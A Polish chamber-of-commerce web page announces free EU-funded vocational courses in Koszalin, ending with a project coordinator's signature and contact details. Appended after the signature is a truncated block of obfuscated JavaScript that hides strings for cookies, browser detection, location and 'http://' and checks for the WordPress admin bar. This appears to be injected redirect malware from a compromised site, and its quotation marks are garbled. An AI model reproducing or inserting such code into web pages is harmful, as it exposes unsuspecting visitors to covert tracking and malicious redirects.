Bezpłatne kursy zawodowe | Północna Izba Gospodarcza w Koszalinie

Projekt pn. „Dodatkowe kształcenie szansą na rozwój zawodowy”

Działanie nr RPZP.08.06.00 Wsparcie szkół i placówek prowadzących kształcenie zawodowe oraz uczniów uczestniczących w kształceniu zawodowym i osób dorosłych uczestniczących w pozaszkolnych formach kształcenia zawodowego

Program współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego

  

Szanowni Państwo.

zapraszamy na bezpłatne kursy zawodowe prowadzone przez Fundację Oświatową – Europejskie Centrum Edukacyjne w ramach projektu „Dodatkowe kształcenie szansą na rozwój”, załączam ulotki ogólne oraz szczegółowe dotyczące wszystkich kursów:

1.      Montowanie stolarki budowlanej.

2.      Przygotowywanie potraw zgodnie z trendami rynkowymi i zasadami zdrowego żywienia.

3.      Projektowanie grafiki komputerowej.

Ogłoszenie w sprawie wspomnianych kursów oraz formularz zgłoszeniowy znajdziecie Państwo na stronie internetowej www.fundacja-ece.edu.pl w zakładce Projekty UE oraz na naszym profilu na FB.

Zachęcam również do kontaktu telefonicznego pod numerem 94 342 48 20 lub 512 224 761.

 

Z wyrazami szacunku,

Żaklina Kamińska

 

Specjalista ds. realizacji projektu pn. „Dodatkowe kształcenie szansa na rozwój zawodowy”

Fundacja Oświatowa – Europejskie Centrum Edukacyjne

ul. T. Chałubińskiego 15, 75-581 Koszalin

  'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m